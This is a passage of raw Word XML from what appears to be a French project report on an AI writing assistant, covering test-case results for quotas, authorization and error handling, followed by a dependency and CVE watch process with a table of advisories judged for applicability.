              <w:t xml:space="preserve">Conforme</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">JE-13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">U4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">D4, action valide (quota = 1, 0 appel)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">201</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, puis</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">429</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">au second appel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Conforme</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">JE-14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">U3 puis U4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">U3 porte le quota de U4 à 5, U4 rappelle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">201</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">— la modification du quota est prise en compte immédiatement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Conforme</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">JE-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">D1, sans en-tête</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">Authorization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">401</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; aucun accès base</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Conforme</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="135"/>
    <w:bookmarkStart w:id="136" w:name="Xcb657d695c5be8ed781e804ebee4f04353a07f6"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Analyse des écarts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Les quinze cas d'essai ont été exécutés dans les conditions décrites ci-dessus : aucun écart n'est constaté entre les données attendues et les données obtenues. Deux réserves rendent ce résultat lisible. Le jeu d'essai valide la mécanique autour du modèle — validation des entrées, autorisation, quota, trace, gestion des erreurs — et non la qualité linguistique des suggestions, qui n'est pas déterministe et ne peut pas faire l'objet d'une assertion. Et JE-12 est le seul cas exécuté sans simulation, serveur d'inférence réellement arrêté ; les autres s'appuient sur un double de test, ce qui est la condition de leur reproductibilité.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Cas limites, et ce qu'ils ont révélé</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quatre cas méritent un commentaire, parce que leur résultat attendu n'est pas évident.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">JE-01 — la génération ne modifie pas le document.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Le contrôle porte autant sur ce qui ne se passe pas que sur ce qui se passe : après un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">201</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, la colonne</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">document.content</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">doit être</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">inchangée</w:t>
      </w:r>
      <w:r>
        <w:t>. C'est la traduction du § 5.6, où « insérer ou remplacer » est un cas d'utilisation distinct de la génération. Un jeu d'essai qui se contenterait de vérifier la présence de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">content_after</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dans la réponse laisserait passer une implémentation qui écrit directement dans le document — c'est-à-dire un produit qui écrit à la place de son utilisateur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">JE-07 et JE-08 forment une paire indissociable.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Pris séparément, chacun peut réussir par accident. C'est leur enchaînement qui prouve le mécanisme : le 20ᵉ appel récent passe parce que la ligne de 25 heures est hors fenêtre, et le 21ᵉ échoue. Un compteur calendaire réussirait JE-08 et échouerait JE-07 ; un compteur stocké sur l'utilisateur pourrait réussir les deux tout en se désynchronisant de l'historique réel — raison pour laquelle le cas exige aussi que le nombre de lignes de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ia</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">corresponde exactement au comptage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">JE-09 et JE-10 testent une égalité, pas un code.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Le résultat attendu n'est pas «</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">404</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dans les deux cas » mais «</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">la même réponse</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dans les deux cas ». C'est la seule formulation qui vérifie réellement la mesure anti-énumération : deux</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">404</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">porteurs de messages différents rétabliraient la fuite d'information.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">JE-12 a été le cas le plus instructif à exécuter.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Il demande d'arrêter réellement le serveur d'inférence, ce qui en fait le seul cas non simulé du jeu d'essai. Il vérifie trois propriétés d'un coup : la traduction de l'exception réseau en</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">RuntimeError</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">par la couche métier, sa transformation en</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">502</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">par la couche route, et surtout l'absence de ligne dans</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ia</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— donc l'absence de consommation de quota.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cette dernière propriété découle uniquement du</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">placement du</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">commit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">après le retour du modèle</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(§ 5.7). Trois lignes déplacées suffiraient à la casser, sans qu'aucune erreur ne se manifeste : l'utilisateur perdrait simplement du quota à chaque panne, ce qui ne se remarquerait qu'à l'usage, et se diagnostiquerait mal. C'est exactement le genre de régression silencieuse qu'un jeu d'essai documenté sert à empêcher.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="136"/>
    <w:bookmarkStart w:id="138" w:name="Xd800d74faac9bc16da3eb38780bb8339a606ece"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Reproductibilité</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le jeu d'essai est rejouable en trois commandes, ce qui est la condition pour qu'il serve de non-régression et pas seulement de démonstration ponctuelle :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="80" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="1825118" cy="288177"/>
            <wp:docPr id="63" name="Picture 63"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c0ba8908117c-0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId77"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1825118" cy="288177"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le script de préparation est</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">idempotent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: il vide les tables concernées avant de les remplir. Relancer le jeu d'essai deux fois de suite produit donc le même résultat. Sans cette précaution, les 19 lignes du journal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ia</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">s'accumuleraient et JE-07 échouerait au second passage, pour une raison qui n'aurait rien à voir avec le code testé — un faux positif qui aurait coûté du temps à comprendre.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB568D2" w14:textId="21268EB6" w:rsidR="003A2DEC" w:rsidRPr="00B1648B" w:rsidRDefault="003A2DEC" w:rsidP="003A2DEC">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1648B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">- la description de la veille, effectuée par le candidat </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Organisation de la veille</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La veille porte sur trois périmètres, chacun avec ses sources et sa fréquence. Le principe directeur est de surveiller</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ce que le projet utilise réellement</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, et non l'actualité de la sécurité en général : une alerte sur une bibliothèque absente du projet n'est pas une information exploitable.</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Périmètre</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sources suivies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fréquence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Dépendances</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">GitHub Advisory Database, avis</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t>npm audit</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">et</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">pip-audit</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, Dependabot sur le dépôt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">À chaque installation, revue hebdomadaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sécurité applicative</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">NVD / CVE.org, alertes CISA, OWASP Top 10, bulletins CERT-FR (ANSSI)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Hebdomadaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Réglementaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CNIL, Commission européenne (AI Act), numerique.gouv.fr (RGAA)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mensuelle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Une entrée n'est retenue que si le composant concerné figure dans</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">requirements.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, dans</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">package.json</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, ou dans l'environnement d'exécution (Ollama, SGBD). Chaque entrée se conclut par un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">verdict d'applicabilité</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: la version utilisée tombe-t-elle dans la plage affectée, et les conditions d'exploitation sont-elles réunies dans cette application ? Une CVE publiée n'est pas une vulnérabilité exploitable ici — et le dire demande de lire la description de la faille, pas seulement son numéro.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le journal complet, avec les fiches détaillées et les sources, constitue un livrable à part (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">docs/veille-helpmedraft.html</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Cette section en présente la synthèse et les conséquences pour le projet.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="139"/>
    <w:bookmarkStart w:id="140" w:name="Xe3d5a06d358b42a985f589b5de0bebffcc8d62a"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Synthèse des entrées — avril à septembre 2026</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLayout w:type="autofi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Composant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Référence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Nature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sévérité publiée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Impact réel ici</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">31/03/2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">axios</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">— (pas de CVE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Compromission de la chaîne d'approvisionnement npm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Critique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Non affecté</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">04/2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ollama</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CVE-2026-7482</w:t>
            </w:r>
          </w:p>
        </w:tc>
